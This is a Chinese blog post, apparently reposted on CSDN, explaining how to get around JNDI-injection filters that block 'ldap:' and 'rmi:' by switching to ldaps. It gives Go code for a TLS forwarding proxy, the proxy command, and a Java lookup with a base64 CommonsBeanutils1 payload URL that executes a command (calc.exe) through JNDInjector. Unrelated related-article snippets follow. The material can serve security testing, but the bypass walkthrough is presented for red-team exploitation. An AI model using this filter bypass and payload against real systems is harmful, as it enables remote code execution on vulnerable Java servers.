如何巧妙构建“LDAPS”服务器利用JNDI注入

于 2024-08-16 23:25:03 发布
阅读量668 收藏 8
点赞数 10
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/asasd101/article/details/141275255
版权

前段时间看到群友问了这样一个问题:

dfb8f8446d5e30220dd890325a6685f2.png

ldap:rmi:关键字被拦截了,是否还可以进行JNDI注入。方法很简单,就是使用ldaps,但后来发现很多人并不知道怎么搭建LDAPS服务器,正好CoNote里有这个功能,写篇简单的文章讲讲。

0x01 LDAPs是什么

在Java JNDI注入的过程中,用户传入一个URL,Java会根据URL的scheme来判断具体使用哪个包来处理,这些包的位置在com.sun.jndi.url.*中:

2ddeb28e68bdacfef50065ce5e03edb5.png

可见,这里除了我们常见的rmi、ldap等,还有一个ldaps,我们看下com.sun.jndi.url.ldaps.ldapsURLContextFactory的代码:

package com.sun.jndi.url.ldaps;

import com.sun.jndi.url.ldap.*;

/**
 * An LDAP URL context factory that creates secure LDAP contexts (using SSL).
 *
 * @author Vincent Ryan
 */

final public class ldapsURLContextFactory extends ldapURLContextFactory {
}

代码比我的钱包还干净,可见ldap和ldaps实际都由com.sun.jndi.url.ldap.ldapURLContextFactory来处理。

这时就不得不说到rfc4510(其中包含rfc4511到rfc4519等多个RFC)了,这一系列RFC中对于LDAP定义了两种安全传输的方式:

  • Opportunistic TLS

  • LDAPS (LDAP over SSL/TLS)

Opportunistic TLS,中文描述为“机会性TLS加密”,意思就是在普通明文通信过程中找“机会”通过某种方式将连接升级成TLS通信。这个概念不止在LDAP中存在,在很多其他协议里也能看到它的身影,最常见的就是SMTP中的STARTTLS命令。

SMTP通信时,客户端与服务端在标准端口(默认为25)上建立 TCP 连接,并且客户端会发送STARTTLS命令告诉服务端开始TLS握手,然后就是常规的TLS握手过程,握手完成后,二者就开始加密通信。

LDAP协议也支持Opportunistic TLS,客户端在原始的通信中也可以通过“StartTLS”开启TLS握手过程。

相比于Opportunistic TLS,LDAPS (LDAP over SSL/TLS)的通信过程就简单很多,LDAPS实际上就是将普通的LDAP协议通信过程包裹一层TLS,客户端在第一次连接服务端口时就需要开始TLS握手。

LDAP和LDAPS的关系可以类比为HTTP和HTTPS,在Java的JNDI中,ldaps通信过程就是使用“LDAPS (LDAP over SSL/TLS)”来实现的。

0x02 CoNote中使用ldaps探测JNDI注入漏洞

CoNote作为一个多功能信息安全测试套件,用于让我们在安全测试、代码审计、Bug Bounty的过程中更方便地确认漏洞的存在,并快速构建复现漏洞的POC。

CoNote中就包含ldap日志的功能,除了支持普通的ldap协议外,也同时支持ldaps。

简单演示一下在CoNote中,如何使用ldaps来探测目标是否存在JNDI注入漏洞。首先,我们在Dashboard中生成或绑定自定义域名,然后在LDAP日志页面,就可以看到探测漏洞所使用的ldaps URL:

f49233b5f159d0e9cf325230d6fa38d0.png

复制任意一个URL,填入下面这个简单的Java类中跑一下即可成功收到LDAP日志:

import javax.naming.Context;
import javax.naming.InitialContext;

public class Sample {
    public static void main(String[] args) throws Exception {
        Context ctx = new InitialContext();
        ctx.lookup("ldaps://[domain]:636/[domain]/ldaps");
    }
}

这个小demo对于Java的版本是没有限制的。我昨天也在『代码审计』星球里说过了这个问题:

说到RMI日志和LDAP日志,当时做这两个功能的时候有CoNote的用户就问我,高版本Java是不是用不上了?

但实际上检测漏洞是不受Java版本影响的(至少到Java 17是这样的),如果CoNote能接收到RMI请求或者LDAP请求,说明存在JNDI注入的问题。至于后续是否可以执行命令,是否需要找利用链,这个就取决于Java版本了。

探测JNDI注入对Java版本没有要求,对于CoNote来说,只是探测漏洞是否存在,做到这一步也就够了。

0x03 “编写”LDAPs服务器

那么对于redteam来说,只检测JNDI注入存在当然是不够的,如何才能建立一个恶意ldaps服务器并利用漏洞呢?很多师傅也提出过这个问题:

b84e943ea17fa3d7011a3b1a71f19f4d.png

其实部分人就钻牛角尖了,我们完全不需要自己编写ldaps服务端,网上有很多现成的JNDI注入利用工具,比如我很喜欢@rebeyond 的JNDInjector,选择好利用链与Payload,就可以生成一个ldap协议的恶意URL:

d992f41a5732aa72c40fe4e259134176.png

当然,这个工具并不支持ldaps,但我们完全可以编写一个TLS反向代理作为中间件,将ldaps请求代理转发给JNDInjector来实现我们的需求。

我曾经在《用原生socket发送HTTP数据包》这篇文章里介绍了如何使用Python发送原生socket数据包,文中提到了HTTPS,其发送原生HTTPS数据包的方法就是使用TLS将普通TCP包裹一层。

对于LDAPS场景来说完全一样,首先使用tls.LoadX509KeyPair加载TLS使用的证书和私钥,并使用tls.Listen创建一个TCP over TLS服务器:

cert, err := tls.LoadX509KeyPair(certPath, keyPath)
if err != nil {
    log.Fatalf(err.Error())
}
config := &tls.Config{Certificates: []tls.Certificate{cert}}

listener, err := tls.Listen("tcp", localAddr, config)
if err != nil {
    log.Fatalf(err.Error())
}
defer listener.Close()

然后使用一个for循环接收请求,每当有新的连接到来时,调用handleConnection()处理:

for {
    conn, err := listener.Accept()
    if err != nil {
        log.Printf(err.Error())
        continue
    }

    log.Println("new connection from", conn.RemoteAddr())
    go handleConnection(conn, remoteAddr)
}

handleConnection中的内容就是将原始的输入流,使用io.Copy转发给上游TCP服务;将上游TCP返回流,转发给原始的连接:

func handleConnection(src net.Conn, remoteAddr string) {
 defer src.Close()

 dest, err := net.Dial("tcp", remoteAddr)
 if err != nil {
  log.Printf(err.Error())
  return
 }
 defer dest.Close()

 go io.Copy(dest, src)
 io.Copy(src, dest)
}

这就实现了一个简单的TLS端口转发的过程,我将这段代码开源在Github上:https://github.com/phith0n/tls_proxy。

0x04 使用tls_proxy+JNDInjector利用漏洞

最后,看看整个漏洞的利用过程是怎样的。

首先,在JNDInjector中选择一个利用链和要执行的命令并启动服务,我这里选择CommonsBeanutils1。如果你的Java版本在8u191以下,也可以不使用任何反序列化利用链。

我将JNDInjector启动的ldap服务监听在1389端口上,然后使用tls_proxy代理转发:

./tproxy -l 127.0.0.1:1636 -r 127.0.0.1:1389 -c cert.pem -k key.pem

注意,这里的cert.pem和key.pem需要是一个合法的TLS证书,我们直接使用certbot或者ssl for free这种在线服务上申请即可。

tls代理启动后,其监听在1636端口,然后我们改下上面那个Java demo(需要安装下CommonsBeanutils依赖),指向1636端口:

import javax.naming.Context;
import javax.naming.InitialContext;

public class Sample {
    public static void main(String[] args) throws Exception {
        Context ctx = new InitialContext();
        ctx.lookup("ldaps://[domain]:1636/EpvahjVjjH/CommonsBeanutils1/Exec/eyJjbWQiOiJjYWxjLmV4ZSJ9");
    }
}

执行成功弹出计算器:

ad10882dc3e67f44f6330f65ee3ca2a8.png

在JNDInjector中,也收到了漏洞利用成功的日志:

5472cf723751bb8d1ad0e801f09fc02b.png

c4ce120784febec622e8a705285bfc08.gif

喜欢这篇文章,点个在看再走吧~

加入「代码审计」,学习更多安全知识。一次付费,终身学习免续费。

9800ad8ff1ba3e9de2916fdfd80a9716.jpeg

落沐萧萧
关注
  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
最简单的LDAPS服务器搭建方法--ApacheDS 安装以及LDAPS配置
03-16
构建 LDAPS 服务器是大数据集群搭建过程中的一个关键步骤。 LDAPS(Lightweight Directory Access Protocol over SSL/TLS)是一种基于 X.509 证书的身份验证机制,提供了安全的身份验证和加密通信功能。在本文中,...
通过 Dbeaver连接ldaps认证的Presto
03-16
### 通过 Dbeaver 连接 LDAPS 认证的 Presto 在当前的大数据处理环境中,Presto 是一种广泛使用的分布式 SQL 查询引擎,它能够查询存储在不同数据库和服务中的数据。为了确保数据传输的安全性,使用 LDAPS(LDAP ...
JNDI 注入漏洞的前世今生
有价值炮灰
12-14 3664
前两天的 log4j 漏洞引起了安全圈的震动,虽然是二进制选手,但为了融入大家的过年氛围,还是决定打破舒适圈来研究一下 JNDI 注入漏洞。 JNDI 101 首先第一个问题,什么是 JNDI,它的作用是什么? 根据官方文档,JNDI 全称为 Java Naming and Directory Interface,即 Java 名称与目录接口。虽然有点抽象,但我们至少知道它是一个接口;下一个问题是,Naming 和 Directory 是什么意思?很多相关资料都对其语焉不详,但其实官方对其有详细解释。 N
log4j jndi注入漏洞
Ye的博客
04-06 1062
JNDILDAP、log for java: log4j Java程序日志监控组件
Log4j2的JNDI注入漏洞原理分析与思考
2401_85763924的博客
06-17 765
通过JNDI,可以将数据库相关的配置在一个支持JNDI服务的容器(通常Tomat等Web容器均支持)中统一完成,并暴露一个简洁的名称,该名称背后绑定着一个 DataSource 对象。再举个更简单的例子,这有点类似DNS提供域名到IP地址的解析服务。可以看到,rc1补丁通过对JNDI Lookup增加白名单的方式,限制默认可以访问的主机为本地IP,限制默认支持的协议类型为 java 、 ldapldaps ,限制LDAP协议默认可以使用的Java类型为少数基础类型,从而大大减少了默认的攻击面。
Log4j2日志框架JNDI注入漏洞分析与复现
两米以下皆凡人的博客
12-14 5204
1、漏洞背景 大家在实际开发中,几乎无可避免的需要用到日志框架,不管你是前端后端客户端,他们可以追踪和记录我们的程序运行中的信息,我们可以利用日志很快定位问题,追踪分析。 而对于Java开发人员来说,最常用的日志框架便是Log4j2和logback,而本次漏洞的主角便是Apache Log4j2,它有一个特别强大的功能插件Lookups 如果我们试图通过日志去输出一个程序中不存在的对象,而在其他地方,那么我们便可以通过这个插件去通过某些方式去查找目标内容,它只提供一种规范,具体使用哪些方式去查找
Log4j2之JNDI注入(CVE-2021-44228)
GalaxySpaceX的博客
06-25 341
Log4j2之JNDI注入(CVE-2021-44228)
Linux服务器Ldap安装及ldaps配置完整流程
justlpf的专栏
01-23 4029
参考文章:presto中ldaps配置完整流程 - letsfly - 博客园 无法以ldaps模式连接到openldap服务器-Java 学习之路
Log4j2的JNDI注入漏洞(CVE-2021-44228)原理分析与思考
jidunkeji的博客
12-24 3025
最近Log4j2的JNDI注入漏洞(CVE-2021-44228)可以称之为“核弹”级别。Log4j2作为类似JDK级别的基础类库,几乎没人能够幸免。本篇文章即对该漏洞进行复现和分析其形成原理。
# ldaps 与 ldap over TLS 的区别
超级无敌棒棒糖
06-17 3809
ldaps 与 ldap over TLS 的区别 文章目录ldaps 与 ldap over TLS 的区别1 LDAP over SSL(即ldaps)2 LDAP over TLS(即ldap + TLS)3 连接方式对比:3.1 启动服务器debug模式3.2 ldaps方式连接3.3 LDAP over TLS方式连接(STARTTLS)4 总结 参考转载:https://blog.csdn.net/seulzz/article/details/108345871 1 LDAP over SS
java hostnameverifier_java – jndi LDAPS自定义HostnameVerifier和TrustManager
weixin_42511098的博客
02-26 205
对于其他人有同样的问题:我找到了一个非常难看的解决方案:import javax.net.SocketFactory;public abstract class ThreadLocalSocketFactoryextends SocketFactory{static ThreadLocal local = new ThreadLocal();public static SocketFactory ...
Security LDAP and LDAPS
12-21
Ldap schemes: Ldap and ldaps Ldap authentication methods LDAP Simple Authentication Example: Simple Authentication over SSL layer SASL Authentication SASL Mechanisms Supported by LDAP Servers Digest-...
rh7.6 nis2ldaps.pdf
08-01
redhat7/centos7下,nis安装部署,从nis转为openldap安装部署,从openldap升级ldaps的详细文档。
LDAP加密访问AD(overssl)(LDAPS )C++
05-17
本文将详细介绍如何在C++环境中,通过LDAPS协议与Active Directory(AD)服务器建立安全连接,并忽略证书验证,以便在证书过期或无效时仍能正常通信。 首先,要实现LDAPS连接,我们需要一个支持SSL/TLS的库。在这个...
美国服务器稳定么?影响服务器稳定性的6个因素
petaexpress的博客
08-09 719
美国服务器的稳定性是相当不错的,这主要得益于其先进的技术、成熟的基础设施以及严格的管理措施。美国拥有众多知名的服务器提供商,这些提供商通常会采用顶级的硬件设施,如英特尔、AMD等知名品牌的处理器,以及三星、金士顿等品牌的内存和硬盘,这些硬件设备在全球范围内具有较高的市场份额和良好的口碑,性能稳定可靠。
vsftpd 文件服务器A中的文件,需复制到B服务器,关闭防火墙,A的文件可以复制到B,打开防火墙,就复制失败分析原因分析和rsync实现文件同步
雨笋情缘的专栏
08-12 677
确认防火墙配置是否允许FTP流量通过。调整VSFTPD配置以启用被动模式并指定合适的端口范围。考虑使用SFTP、SCP或rsync作为替代方案。请根据实际情况调整上述建议。如果有具体的操作系统版本或者详细的VSFTPD配置信息,我可以提供更加具体的帮助。
windows bat脚本基础指令详解
最新发布
weixin_39789796的博客
08-16 269
CMD在解释我们的命令的时候,首先会读取命令行一条完整的命令。如果我们要在我们的命令中引用一些变量,那么我们如何让CMD在解释我们的命令时。当CMD在对读取我们的整行命令进行格式匹配的时候,就会发现name这个字符两边加了%号,就不会把他当作普通字符处理,而是会把他当 作一个变量处理。然后CMD就会找到变量名对应的值,用变量名的值替换掉这个变量名字(name),(如果变量名不存在值,就返回空 值)。这个在预编译的时候将%var%替换成%%i,但是%%i又不认识是什么,所以程序在运行的时候就会出错。
linux HBA驱动中scsi_host_template .shost_attrs
Wang20122013的博客
08-13 491
scsi_host_template是一个结构体,用于定义SCSI主机(host adapter)的属性和操作。这个模板用于初始化SCSI主机结构体scsi_host_template,它包含了主机的属性、操作函数等。shost_attrs是scsi_host_template结构体中的一个成员,它是一个属性组,用于定义SCSI主机可以支持的属性。每个属性都会有相应的操作函数,这些函数定义了如何读取或写入属性值。例如,一个属性可能有一个show函数来返回当前值,一个store函数来设置新值。
php使用LDAPS连接AD服务器
05-11
要使用PHP连接AD服务器LDAPS协议,需要确保PHP安装了OpenSSL扩展和LDAP扩展,并且AD服务器已经配置了LDAPS。 以下是一个基本的LDAPS连接示例: ```php <?php $ldaphost = "ldaps://your.ad.server"; // AD服务器LDAPS协议地址 $ldapport = "636"; // LDAPS协议端口号 $ldaprdn = "cn=yourusername,ou=yourou,dc=yourdomain,dc=com"; // AD管理员账号 $ldappass = "yourpassword"; // AD管理员密码 $ldapconn = ldap_connect($ldaphost, $ldapport); if ($ldapconn) { ldap_set_option($ldapconn, LDAP_OPT_PROTOCOL_VERSION, 3); ldap_set_option($ldapconn, LDAP_OPT_REFERRALS, 0); $ldapbind = ldap_bind($ldapconn, $ldaprdn, $ldappass); if ($ldapbind) { echo "LDAP bind successful..."; } else { echo "LDAP bind failed..."; } } ?> ``` 需要注意的是,使用LDAPS连接AD服务器需要确保PHP运行环境的OpenSSL扩展已经启用,并且AD服务器已经安装了有效的SSL证书。否则会导致连接失败。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值